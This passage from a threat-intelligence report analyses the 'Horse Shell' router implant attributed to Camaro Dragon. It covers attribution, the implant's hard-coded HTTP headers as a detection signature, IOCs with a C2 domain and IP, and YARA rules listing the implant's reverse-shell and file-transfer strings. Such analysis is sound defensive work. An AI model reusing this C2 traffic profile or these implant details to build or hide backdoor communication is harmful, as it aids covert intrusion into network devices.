with a remote shell on the infected device. The\r\ncode itself, however, isn’t similar between the two implants, although it has some mutual design and architectural\r\ndecisions.\r\nWe don’t know for sure whether the two implants were written by the same developers and we don’t have\r\nevidence to suggest that this is the case. Pakdoor was used by APT31 and Horse Shell was seen in an operation by\r\nCamaro Dragon, two seemingly distinct groups.\r\nAttribution\r\nWe found the Horse Shell implant while analyzing sophisticated attacks targeting officials in multiple European\r\ncountries. The campaign leveraged a wide variety of tools, among them tools commonly associated with Chinese\r\nstate-sponsored threat actors. The activity we analyzed has significant overlaps with activities publicly disclosed\r\nby Avast and Eset, linking it to the Chinese-affiliated APT group “Mustang Panda”. We attribute this activity to a\r\nChinese state-sponsored group we call Camaro Dragon. There is enough evidence to suggest that Camaro Dragon\r\nhas significant overlaps with Mustang Panda, alas we can’t say that this is a full overlap or that these two are the\r\nexact same group.\r\nFollowing are some aspects worth paying attention to regarding the attribution of the tool.\r\nServer and infrastructure\r\nNot only that we found the implant on a server related to the Camaro Dragon activity, we also found out that the\r\nIP address (91.245.253[.]72) to which Horse Shell’s C\u0026C resolves to is listed on Avast’s report on their analysis of\r\nthe Mustang Panda campaign. Given the significant overlaps between Mustang Panda and the group we call\r\nCamaro Dragon, it is likely that the router implant was deployed by other campaigns of the group.\r\nChinese HTTP Request\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 18 of 45\n\nWe described how when Horse Shell transmits data from the infected device, they use a hard-coded HTTP\r\nheaders. When we searched for this header online we found the exact same HTTP headers appearing on several\r\nChinese websites like CSDN in what seems rather esoteric posts. We did not find the same headers on global\r\nforums and platforms such as GitHub or Stack Exchange. This suggests that the authors of the implant may have\r\nsearched for these headers on Chinese forums or used Chinese search queries to arrive at these examples.\r\nTypos\r\nAs we started analyzing Horse Shell, we understood very quickly that the binary is full of debug logs and string\r\nartifacts. When doing attribution we try to pay a lot of attention to the language used by the attackers on their\r\nimplants. While overall the level of English in the implant was quite good, we did notice some typos, some of\r\nthem repeated again and again across different functions and log strings in the binary. Some of them are:\r\n“tatal len” — instead of “total”\r\n“call file_get_http_filed” — instead of “field”\r\n“s_dbgMsg = “write pid faile.” — instead of “failed”\r\n“file transfer download open file %s fialed!” — instead of “failed”\r\n“delete file:%s fialed,open fialed ret=%d” — instead of “failed”\r\n“unkown file transfer sub cmd” — instead of “unknown”\r\n“not enough sapce to save lan ipv4 and port” — instead of “space”\r\n“not enough sapce to malloc a port relay info!”— instead of “space”\r\nSuch mistakes can suggest the authors of the implant are not native English speakers as these mistakes should be\r\nvery visible to developers with a higher level of written English.\r\nVictims\r\nOur investigation of the Camaro Dragon activity was of a campaign targeted mainly at European foreign affairs\r\nentities. However, even though we found Horse Shell on the attacking infrastructure, we don’t know who are the\r\nvictims of the router implant. Learning from history, router implants are often installed on arbitrary devices with\r\nno particular interest, with the aim to create a chain of nodes between main infections and real command and\r\ncontrol. In other words, infecting a home router does not mean that the homeowner was specifically targeted, but\r\nrather that they are only a means to a goal.\r\nFocus on Network Devices\r\nEarlier in this report we discussed similarities between Horse Shell and another router MIPS implant called\r\nPakdoor (or SoWat). Although the two share some commonalities, it is unclear whether one was developed from\r\nthe other or if these are two distinct malware implants. Nevertheless, Pakdoor — being deployed by the Chinese\r\nstate-sponsored group APT31 — together with other known instances of zero-day exploits and custom firmware\r\nand backdoors for routers and security gateways, demonstrates that such capabilities and types of attacks are of\r\nconsistent interest and focus of Chinese-affiliated threat actors.\r\nDetection and Protection\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 19 of 45\n\nThe discovery of Camaro Dragon’s malicious implant on TP-Link routers highlights the need for individuals and\r\norganizations to take measures to protect themselves from similar attacks. Here are some protection and detection\r\nrecommendations.\r\nNetwork Protections\r\nHorse Shell communicates with its peers using HTTP with hard-coded headers. Although the Headers were most\r\nlikely copied from online forums, they are quite unique and can be used for the detection of communication from\r\npotentially infected devices. Traffic using this user agent is likely to be malicious. Use such detection signature\r\nwith caution, as theoretically, it can block non-malicious traffic.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nPOST http://[host name]/index.php HTTP/1.1\r\nAccept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint,\r\napplication/vnd.ms-excel, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2;\r\n.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nAccept-Encoding: gzip, deflate\r\nHost: [host name]\r\nConnection: Keep-Alive\r\nPOST http://[host name]/index.php HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif,\r\napplication/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword,\r\napplication/vnd.ms-powerpoint, application/vnd.ms-excel, */* Accept-Language: en-US User-Agent: Mozilla/4.0\r\n(compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2; .NET CLR 2.0.50727; .NET\r\nCLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3) Accept-Encoding: gzip, deflate Host: [host name] Connection:\r\nKeep-Alive\r\nPOST http://[host name]/index.php HTTP/1.1\r\nAccept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, appli\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2\r\nAccept-Encoding: gzip, deflate\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 20 of 45\n\nHost: [host name]\r\nConnection: Keep-Alive\r\nSoftware Updates\r\nIt’s important to emphasize how important it is to keep your network devices’ firmware version up-to-date. Make\r\nsure to regularly update routers and other devices’ firmware and software to prevent vulnerabilities exploited by\r\nattackers.\r\nDefault Credentials\r\nAlways change the default login credentials of any device connected to the internet to stronger passwords and use\r\nmulti-factor authentication whenever possible. Attackers are scanning the internet for devices that kept the default\r\ncredentials of their device.\r\nCheck Point‘s network security solutions provide advanced threat prevention and real-time network protection\r\nagainst sophisticated attacks like those used by the Camaro Dragon APT group. This includes protection against\r\nexploits, malware, and other advanced threats. Check Point’s Quantum IoT Protect automatically identifies and\r\nmaps IoT devices and assesses the risk, prevents unauthorized access to and from IoT/OT devices with zero-trust\r\nprofiling and segmentation and blocks attacks against IoT devices. Check Point’s Threat Emulation detects these\r\nthreats as APT.Wins.HorseShell.A and APT.Wins.HorseShell.B .\r\nConclusion\r\nOur analysis of the Chinese state-sponsored APT group Camaro Dragon’s attacks on European foreign affairs\r\nentities has uncovered a malicious firmware implant tailored for TP-Link routers. The implant features a custom\r\nbackdoor called “Horse Shell” which enables the attackers to perform actions like remote shell, file transfer, and\r\nnetwork tunneling, making it easier for them to anonymize their communication through a chain of infected\r\nnodes.\r\nThrough our investigation, we have gained a deeper comprehension of the ways in which attackers are employing\r\nmalware to target edge devices, particularly routers. Our efforts have led us to uncover several of the tactics and\r\ntools utilized by Camaro Dragon in their attacks. Our findings not only contribute to a better understanding of the\r\nCamaro Dragon group and their toolset but also to the broader cybersecurity community, providing crucial\r\nknowledge for understanding and defending against similar threats in the future.\r\nFurthermore, our discovery of the firmware-agnostic nature of the implanted components indicates that a wide\r\nrange of devices and vendors may be at risk. We hope that our research will contribute to improving the security\r\nposture of organizations and individuals alike. In the meantime, remember to keep your network devices updated\r\nand secured, and beware of any suspicious activity on your network — you never know who might be lurking in\r\nthe dragon’s lair!\r\nCheck Point Customers Remain Protected\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 21 of 45\n\nCheck Point’s network security solutions provide advanced threat prevention and real-time network protection\r\nagainst sophisticated attacks like those used by the Camaro Dragon APT group. This includes protection against\r\nexploits, malware, and other advanced threats. Check Point’s Quantum IoT Protect automatically identifies and\r\nmaps IoT devices and assesses the risk, prevents unauthorized access to and from IoT/OT devices with zero-trust\r\nprofiling and segmentation, and blocks attacks against IoT devices.\r\nCheck Point IoT Embedded with Nano Agent® provides on-device runtime protection enabling connected devices\r\nwith built-in firmware security. The Nano Agent® is a customized package which provides the top security\r\ncapabilities and prevents malicious activity on routers, network devices and other IoT devices. Check Point IoT\r\nNano Agent® has advanced capabilities of memory protection, anomaly detection, and control flow integrity. It\r\noperates inside the device, and serves as a frontline to secure IoT devices.\r\nAppendix A – IOCs\r\nSHA256 File Name\r\n998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c udhcp\r\n7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a sheel\r\ned3d667a4fa92d78a0a54f696f4e8ff254def8d6f3208e6fe426dbe7fb3f3dd0 shell\r\n66cc81a7d865941cb32ed7b1b84b20270d7d667b523cab28b856cd4e85f135b6 timer\r\n8a2e9f6c2b0c898090fdce021b3813313e73a256a5de39c100bf9868abc09dbb 9406.dat\r\nda046a1fe6f3b94e48c24ffd341f8d97bfc06252ddf4d332e8e2478262ad1964 9404.dat\r\nWritten Files\r\nFile Name Description\r\n/vat/udhcp.cnf Contains kill -9 [pid] command that has the pid of the running implant\r\n/var/udhcp A mutex like file that will be created when the implant is running.\r\n.remote_shell.log Log file of the remote shell functionality of the implant\r\nInfrastructure\r\nIoC Description\r\nm.cremessage[.]com Command and Control\r\n91.245.253[.]72 Hosts TPLink implant C2 domain m[.]cremessage[.]com\r\nAppendix B: Yara Signatures\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 22 of 45\n\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nrule apt_CN_CamaroDragon_horseshell_strings {\r\nmeta:\r\nauthor = \"Itay Cohen @ Check Point Research\"\r\ndate = \"2023-04-01\"\r\ndescription = \"Detects CamaroDragon's HorseShell implant for routers based on embedded strings. This rule is\r\nbroad.\"\r\nhash = \"998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c\"\r\nreference = \"\"\r\nstrings:\r\n// Crypto\r\n$crypto_1 = \"wzsw_srand\"\r\n$crypto_2 = \"wzsw_rand\"\r\n$crypto_3 = \"wzsw_init\"\r\n$crypto_4 = \"wzsw_crypto_free\"\r\n$crypto_5 = \"wzsw_crypto_new\"\r\n$crypto_6 = \"wzsw_encrypt_buf\"\r\n$crypto_7 = \"wzsw_crypto_reset\"\r\n// File names\r\n$filename_1 = \"common/wzsw_crypto.c\"\r\n$filename_2 = \"http/http_socks_tun.cc\"\r\n$filename_3 = \"http/http_trans_file.cc\"\r\n$filename_4 = \"http/http_horse_shell.cc\"\r\n$filename_5 = \"http/http_online.cc\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 23 of 45\n\n// Debug strings\r\n$debug_1 = \"add_file_transfer_info_to_list\"\r\n$debug_2 = \"before trans data need connect\"\r\n$debug_3 = \"before trans data need connect2\"\r\n$debug_4 = \"cancel current task!\"\r\n$debug_5 = \"cancel task from task list!\"\r\n$debug_6 = \"cancel task task id\"\r\n$debug_7 = \"check file file_type is %d, neither file nor dir !\"\r\n$debug_8 = \"check_file_transfer_conn_heart_beat\"\r\n$debug_9 = \"check_module_heart_beat\"\r\n$debug_10 = \"check_socks_tun_conn_heart_beat\"\r\n$debug_11 = \"conn_marked_close\"\r\n$debug_12 = \"conn_peek socket (sock=%d) closed\"\r\n$debug_13 = \"conn_peek socket (sock=%d) recv error,err=%d\"\r\n$debug_14 = \"conn_read socket (sock=%d) closed\"\r\n$debug_15 = \"conn_read socket (sock=%d) recv error,err=%d\"\r\n$debug_16 = \"conn_readfrom socket (sock=%d) recv error,err=%d\"\r\n$debug_17 = \"connect lan '%s:%d' in progress!\"\r\n$debug_18 = \"create_shell_conn_session\"\r\n$debug_19 = \"create_shell_pty_session\"\r\n$debug_20 = \"current task %p is not download!\"\r\n$debug_21 = \"file transfer download open file %s succeed!\"\r\n$debug_22 = \"file transfer oper %d neither download nor upload\"\r\n$debug_23 = \"file transfer process connect port cmd-\u003eport\"\r\n$debug_24 = \"file transfer upload open file %s succeed\"\r\n$debug_25 = \"file_transfer_data_request...cur_len=%d\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 24 of 45\n\n$debug_26 = \"file_transfer_data_request...SEND_RSP\"\r\n$debug_27 = \"file_transfer_data_request\"\r\n$debug_28 = \"file_transfer_delete_request\"\r\n$debug_29 = \"file_transfer_download_request\"\r\n$debug_30 = \"file_transfer_free_cb\"\r\n$debug_31 = \"file_transfer_info port %d already started!\"\r\n$debug_32 = \"file_transfer_process_connect_port\"\r\n$debug_33 = \"file_transfer_query_request\"\r\n$debug_34 = \"file_transfer_send_file_data\"\r\n$debug_35 = \"file_transfer_upload_request\"\r\n$debug_36 = \"find ipv4=%s, port=%d by lan success!\"\r\n$debug_37 = \"find_connected_port_relay_info\"\r\n$debug_38 = \"find_port_relay_info_by_lan\"\r\n$debug_39 = \"find_start_connect_port_relay_info\"\r\n$debug_40 = \"free file transfer info!\"\r\n$debug_41 = \"get_file_transfer_info_by_conn\"\r\n$debug_42 = \"get_file_transfer_info_by_port\"\r\n$debug_43 = \"get_free_port_relay_info\"\r\n$debug_44 = \"get_port_relay_info_from_list_by_port_relay_conn\"\r\n$debug_45 = \"get_socks_tun_info_from_list_by_conn\"\r\n$debug_46 = \"get_socks_tun_info_from_list_by_port\"\r\n$debug_47 = \"horse_shell_start\"\r\n$debug_48 = \"http online data length %d too long\"\r\n$debug_49 = \"http_rsp:%s\"\r\n$debug_50 = \"info-\u003estate=%d not connected!\"\r\n$debug_51 = \"invalid NATPORT_COMM_CMD_CONNECT\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 25 of 45\n\n$debug_52 = \"invalid NATPORT_COMM_CMD_DISCONNECT\"\r\n$debug_53 = \"malloc file transfer info!\"\r\n$debug_54 = \"neither cancel upload nor cancel download\"\r\n$debug_55 = \"not connected, begin to connect!\"\r\n$debug_56 = \"not enough sapce to malloc a port relay info!\"\r\n$debug_57 = \"other file transfer task oper %d\"\r\n$debug_58 = \"recv check file '%s' exists request, file %s\"\r\n$debug_59 = \"remove current task!\"\r\n$debug_60 = \"remove_file_transfer_info_from_list\"\r\n$debug_61 = \"reverse_shell can not find bash or sh\"\r\n$debug_62 = \"shell create connection to %s:%d succeed\"\r\n$debug_63 = \"shell create_shell_pty_session succeed!\"\r\n$debug_64 = \"shell process connect port cmd-\u003eport\"\r\n$debug_65 = \"shell_pty_session_free_cb, socket=%d\"\r\n$debug_66 = \"socks tun connect lan\"\r\n$debug_67 = \"socks tun create connection %p to %s:%d succeed!\"\r\n$debug_68 = \"socks tun port %d already opened!\"\r\n$debug_69 = \"socks tun process connect port\"\r\n$debug_70 = \"socks tun try connect lan\"\r\n$debug_71 = \"trans file create connection to %s:%d succeed!\"\r\n$debug_72 = \"trans_file_start\"\r\n$debug_73 = \"tun_info-\u003efree_list\"\r\n$debug_74 = \"tun_info-\u003eused_list\"\r\n$debug_75 = \"unkown file transfer sub cmd\"\r\n$debug_76 = \"unkown socks tun sub cmd\"\r\n$debug_77 = \"shell_conn_session_connect_cb\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 26 of 45\n\n$debug_78 = \"shell_conn_session_free_cb\"\r\n$debug_79 = \"shell_get_body_from_http_rsp\"\r\n$debug_80 = \"shell_get_http_body\"\r\n$debug_81 = \"shell_get_http_filed\"\r\n// Commands\r\n$command_1 = \"SOCKS TUN REQ_CONNECT_PORT\"\r\n$command_2 = \"SOCKS TUN NATPORT_COMM_CMD_CONNECT\"\r\n$command_3 = \"SOCKS TUN NATPORT_COMM_CMD_OPEN\"\r\n$command_4 = \"SOCKS TUN NATPORT_COMM_CMD_DATA\"\r\n$command_5 = \"SOCKS TUN NATPORT_COMM_CMD_CLOSE\"\r\n$command_6 = \"SOCKS TUN NATPORT_COMM_CMD_DISCONNECT\"\r\n$command_7 = \"SOCKS TUN NATPORT_COMM_CMD_CHECK\"\r\n$command_8 = \"SOCKS TUN REQ_MODULE_HEARTBEAT\"\r\n$command_9 = \"NET_REQ_HORSE_SHELL REQ_CONNECT_PORT\"\r\n$command_10 = \"FILE_TRANSFER REQ_CONNECT_PORT\"\r\n$command_11 = \"FILE_TRANSFER_OPER_DOWNLOAD\"\r\n$command_12 = \"FILE_TRANSFER_OPER_UPLOAD\"\r\n$command_13 = \"FILE_TRANSFER_OPER_CANCEL_DOWNLOAD\"\r\n$command_14 = \"FILE_TRANSFER_OPER_CANCEL_UPLOAD\"\r\n$command_15 = \"FILE_TRANSFER_TRANS_FILE_DATA\"\r\n$command_16 = \"FILE_TRANSFER_OPER_DELETE\"\r\n$command_17 = \"FILE_TRANSFER_OPER_QUERY\"\r\n$command_18 = \"FILE_TRANSFER_OPER_CHECK_EXISTS\"\r\n$command_19 = \"REQ_MODULE_HEARTBEAT\"\r\n// Error strings\r\n$error_1 = \" \u003e .remote_shell.log\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 27 of 45\n\n$error_2 = \"calloc mem for hall_device_online_req failed!\"\r\n$error_3 = \"conn_listening_conn bind sock=%d failed\"\r\n$error_4 = \"conn_listening_conn listen sock=%d failed\"\r\n$error_5 = \"conn_listening_conn set sock=%d address failed\"\r\n$error_6 = \"conn_listening_conn set sock=%d nonblock failed\"\r\n$error_7 = \"conn_listening_conn set sock=%d reuse address failed\"\r\n$error_8 = \"conn_listening_conn set sock=%d tcp no delay failed\"\r\n$error_9 = \"conn_tcp_conn connect sock=%d failed,err=%d\"\r\n$error_10 = \"conn_tcp_conn set sock=%d address failed,err=%d\"\r\n$error_11 = \"conn_tcp_conn set sock=%d nonblock failed,err=%d\"\r\n$error_12 = \"conn_tcp_conn set sock=%d reuse address failed,err=%d\"\r\n$error_13 = \"conn_tcp_conn set sock=%d tcp no delay failed,err=%d\"\r\n$error_14 = \"conn_udp_conn bind sock=%d failed\"\r\n$error_15 = \"conn_udp_conn set sock=%d address failed\"\r\n$error_16 = \"conn_udp_conn set sock=%d nonblock failed\"\r\n$error_17 = \"conn_udp_conn set sock=%d reuse address failed\"\r\n$error_18 = \"create file_transfer_info failed!\"\r\n$error_19 = \"create g_file_transfer_info_list failed!\"\r\n$error_20 = \"create g_socks_tun_list failed!\"\r\n$error_21 = \"create shell conn session failed!\"\r\n$error_22 = \"crypto_decrypt_buf error,\"\r\n$error_23 = \"delete file:%s fialed\"\r\n$error_24 = \"disconnect this http conn\"\r\n$error_25 = \"download file %s failed, safe read length=%d from fd=%d failed, retlen=%d!\"\r\n$error_26 = \"file transfer download open file %s fialed!\"\r\n$error_27 = \"file transfer process connect port failed, ret = %d!\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 28 of 45\n\n$error_28 = \"file transfer upload open file %s failed\"\r\n$error_29 = \"find connected ipv4_port ipv4=%s, port=%d failed!\"\r\n$error_30 = \"find connected port_relay_info ipv4=%s, port=%d failed!\"\r\n$error_31 = \"find ipv4=%s, port=%d by lan failed!\"\r\n$error_32 = \"get a free port_relay_info failed , not enough sapce to save lan ipv4 and port\"\r\n$error_33 = \"http connect failed, errno=%d, reason=%s\"\r\n$error_34 = \"http data length %d too long\"\r\n$error_35 = \"init conf failed\"\r\n$error_36 = \"open fialed ret=%d\"\r\n$error_37 = \"peek http rsp failed!\"\r\n$error_38 = \"peek socks tun data from %s:%d sock=%d failed!\"\r\n$error_39 = \"read ip failed, %m\"\r\n$error_40 = \"resolve online domain failed\"\r\n$error_41 = \"send data to dst socket %d failed!\"\r\n$error_42 = \"send failed (sock=%d,err=%d)\"\r\n$error_43 = \"sendto failed (peer address=%s,err=%d)\"\r\n$error_45 = \"set socket opt failed, %m!\"\r\n$error_46 = \"shell create connection to %s:%d failed!\"\r\n$error_47 = \"shell create_shell_pty_session failed!\"\r\n$error_48 = \"shell process connect port failed, ret = %d!\"\r\n$error_49 = \"socks tun connect lan '%s:%d' failed!\"\r\n$error_50 = \"socks tun create connection to %s:%d failed!\"\r\n$error_51 = \"socks tun port %d already opened!\"\r\n$error_52 = \"socks tun process connect port failed, ret = %d!\"\r\n$error_53 = \"socks tun try connect lan '%s:%d' failed!\"\r\n$error_54 = \"socks_tun_connect_cb failed %p\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 29 of 45\n\n$error_55 = \"socks_tun_info_new failed!\"\r\n$error_56 = \"start shell '%s' failed!\"\r\n$error_57 = \"tcp online create conn failed!\"\r\n$error_58 = \"tcp online create http_online_info_t failed!\"\r\n$error_59 = \"trans file create connection to %s:%d failed!\"\r\n$error_60 = \"try connect failed\"\r\n$error_61 = \"try connect lan '%s:%d' failed!\"\r\n$error_62 = \"wzsw_init failed\"\r\n// function names\r\n$function_1 = \"shell_conn_session_connect_cb\"\r\n$function_2 = \"shell_conn_session_free_cb\"\r\n$function_3 = \"shell_get_body_from_http_rsp\"\r\n$function_4 = \"shell_get_http_body\"\r\n$function_5 = \"shell_get_http_filed\"\r\n$function_6 = \"send_file_transfer_conn_heart_beat\"\r\n$function_7 = \"send_file_transfer_http_data_net_packet\"\r\n$function_8 = \"send_horse_shell_http_data_net_packet\"\r\n$function_9 = \"send_module_heart_beat\"\r\n$function_10 = \"send_socks_tun_cmd_info_packet\"\r\n$function_11 = \"send_socks_tun_conn_heart_beat\"\r\n$function_12 = \"send_socks_tun_http_data_net_packet\"\r\n$function_13 = \"send_socks_tun_net_packet\"\r\n$function_14 = \"send_socks_tun_status_packet\"\r\n$function_15 = \"socks_get_body_from_http_rsp\"\r\n$function_16 = \"socks_get_http_body\"\r\n$function_17 = \"socks_get_http_filed\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 30 of 45\n\n$function_18 = \"socks_tun_conn_cb\"\r\n$function_19 = \"socks_tun_conn_free_cb\"\r\n$function_20 = \"socks_tun_conn_lan_cb\"\r\n$function_21 = \"socks_tun_conn_lan_free_cb\"\r\n$function_22 = \"socks_tun_connect_cb\"\r\n$function_23 = \"socks_tun_connect_lan_cb\"\r\n$function_24 = \"socks_tun_info_free\"\r\n$function_25 = \"socks_tun_info_new\"\r\n$function_26 = \"socks_tun_process_check\"\r\n$function_27 = \"socks_tun_process_connect_port\"\r\n$function_28 = \"socks_tun_process_connect\"\r\n$function_29 = \"socks_tun_process_data\"\r\n$function_30 = \"socks_tun_process_disconnect\"\r\n$function_31 = \"socks_tun_process_open\"\r\n$function_32 = \"socks_tun_start\"\r\n$function_33 = \"socks_tun_try_connect_lan_port_cb\"\r\n$function_34 = \"check_file_transfer_conn_heart_beat\"\r\n$function_35 = \"check_socks_tun_conn_heart_beat\"\r\n$function_36 = \"conn_init_tcp_conn\"\r\n$function_37 = \"conn_marked_close\"\r\n$function_38 = \"conn_read_buffer_length\"\r\n$function_39 = \"conn_set_callback\"\r\n$function_40 = \"conn_set_free_callback\"\r\n$function_41 = \"conn_set_user_data\"\r\n$function_42 = \"conn_start_read\"\r\n$function_43 = \"conn_start_write\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 31 of 45\n\n$function_44 = \"conn_stop_write\"\r\n$function_45 = \"conn_tcp_conn\"\r\n$function_46 = \"conn_uninit_containers\"\r\n$function_47 = \"find_connected_port_relay_info\"\r\n$function_48 = \"find_port_relay_info_by_lan\"\r\n$function_49 = \"find_start_connect_port_relay_info\"\r\n$function_50 = \"get_free_port_relay_info\"\r\n$function_51 = \"get_port_relay_info_from_list_by_port_relay_conn\"\r\n$function_52 = \"get_port_relay_info\"\r\n$function_53 = \"horse_main\"\r\n$function_54 = \"process_dev_online\"\r\n$function_55 = \"process_http_read_events\"\r\n$function_56 = \"process_shell_conn_session_read_events\"\r\n$function_57 = \"process_shell_conn_session_write_events\"\r\n$function_58 = \"put_port_relay_info\"\r\n$function_59 = \"send_file_transfer_conn_heart_beat\"\r\n$function_60 = \"send_socks_tun_conn_heart_beat\"\r\n$function_61 = \"process_file_transfer_read_events\"\r\n$function_62 = \"process_file_transfer_write_events\"\r\n$function_63 = \"process_pty_conn_read_events\"\r\n$function_64 = \"process_pty_conn_write_events\"\r\n$function_65 = \"process_shell_conn_connect_port\"\r\n$function_66 = \"process_shell_conn_session_read_events\"\r\n$function_67 = \"process_shell_conn_session_write_events\"\r\n$function_68 = \"process_socks_tun_lan_conn_read_events\"\r\n$function_69 = \"process_socks_tun_read_events\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 32 of 45\n\n$function_70 = \"process_transfile_task\"\r\n$function_71 = \"put_port_relay_info\"\r\n$function_72 = \"socks_get_body_from_http_rsp\"\r\n$function_73 = \"socks_get_http_body\"\r\n$function_74 = \"socks_get_http_filed\"\r\n$function_75 = \"socks_tun_conn_cb\"\r\n$function_76 = \"socks_tun_conn_free_cb\"\r\n$function_77 = \"socks_tun_conn_lan_cb\"\r\n$function_78 = \"socks_tun_conn_lan_free_cb\"\r\n$function_79 = \"socks_tun_connect_cb\"\r\n$function_80 = \"socks_tun_connect_lan_cb\"\r\n$function_81 = \"socks_tun_info_free\"\r\n$function_82 = \"socks_tun_info_new\"\r\n$function_83 = \"socks_tun_process_check\"\r\n$function_84 = \"socks_tun_process_connect_port\"\r\n$function_85 = \"socks_tun_process_connect\"\r\n$function_86 = \"socks_tun_process_data\"\r\n$function_87 = \"socks_tun_process_disconnect\"\r\n$function_88 = \"socks_tun_process_open\"\r\n$function_89 = \"socks_tun_start\"\r\n$function_90 = \"socks_tun_try_connect_lan_port_cb\"\r\n// Globals\r\n$global_1 = \"g_socks_tun_list\"\r\ncondition:\r\nfilesize \u003c 2MB and\r\n3 of ($crypto_*) or\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 33 of 45\n\n2 of ($filename_*) or\r\n3 of ($debug_*) or\r\nany of ($command_*) or\r\n3 of ($error_*) or\r\n3 of ($function_*) or\r\n$global_1 or\r\n5 of them\r\n}\r\nrule apt_CN_CamaroDragon_sheel_strings {\r\nmeta:\r\nauthor = \"Itay Cohen @ Check Point Research\"\r\ndate = \"2023-04-01\"\r\ndescription = \"Detects CamaroDragon's sheel tool.\"\r\nhash = \"7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a\"\r\nreference = \"\"\r\nstrings:\r\n$ = \"write failed.open fail.\"\r\n$ = \"open fail.%m\"\r\n$ = \"./sheel -h server_ip -p server_port -i update_index[0-4] [-r]\"\r\n$ = \"./sheel -h\"\r\n$ = \"update server list success!\"\r\ncondition:\r\nfilesize \u003c 12KB and\r\n3 of them\r\n}\r\nrule apt_CN_CamaroDragon_horseshell_strings { meta: author = \"Itay Cohen @ Check Point Research\" date =\r\n\"2023-04-01\" description = \"Detects CamaroDragon's HorseShell implant for routers based on embedded strings.\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 34 of 45\n\nThis rule is broad.\" hash = \"998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c\"\r\nreference = \"\" strings: // Crypto $crypto_1 = \"wzsw_srand\" $crypto_2 = \"wzsw_rand\" $crypto_3 = \"wzsw_init\"\r\n$crypto_4 = \"wzsw_crypto_free\" $crypto_5 = \"wzsw_crypto_new\" $crypto_6 = \"wzsw_encrypt_buf\" $crypto_7 =\r\n\"wzsw_crypto_reset\" // File names $filename_1 = \"common/wzsw_crypto.c\" $filename_2 =\r\n\"http/http_socks_tun.cc\" $filename_3 = \"http/http_trans_file.cc\" $filename_4 = \"http/http_horse_shell.cc\"\r\n$filename_5 = \"http/http_online.cc\" // Debug strings $debug_1 = \"add_file_transfer_info_to_list\" $debug_2 =\r\n\"before trans data need connect\" $debug_3 = \"before trans data need connect2\" $debug_4 = \"cancel current task!\"\r\n$debug_5 = \"cancel task from task list!\" $debug_6 = \"cancel task task id\" $debug_7 = \"check file file_type is %d,\r\nneither file nor dir !\" $debug_8 = \"check_file_transfer_conn_heart_beat\" $debug_9 = \"check_module_heart_beat\"\r\n$debug_10 = \"check_socks_tun_conn_heart_beat\" $debug_11 = \"conn_marked_close\" $debug_12 = \"conn_peek\r\nsocket (sock=%d) closed\" $debug_13 = \"conn_peek socket (sock=%d) recv error,err=%d\" $debug_14 =\r\n\"conn_read socket (sock=%d) closed\" $debug_15 = \"conn_read socket (sock=%d) recv error,err=%d\" $debug_16\r\n= \"conn_readfrom socket (sock=%d) recv error,err=%d\" $debug_17 = \"connect lan '%s:%d' in progress!\"\r\n$debug_18 = \"create_shell_conn_session\" $debug_19 = \"create_shell_pty_session\" $debug_20 = \"current task %p\r\nis not download!\" $debug_21 = \"file transfer download open file %s succeed!\" $debug_22 = \"file transfer oper\r\n%d neither download nor upload\" $debug_23 = \"file transfer process connect port cmd-\u003eport\" $debug_24 = \"file\r\ntransfer upload open file %s 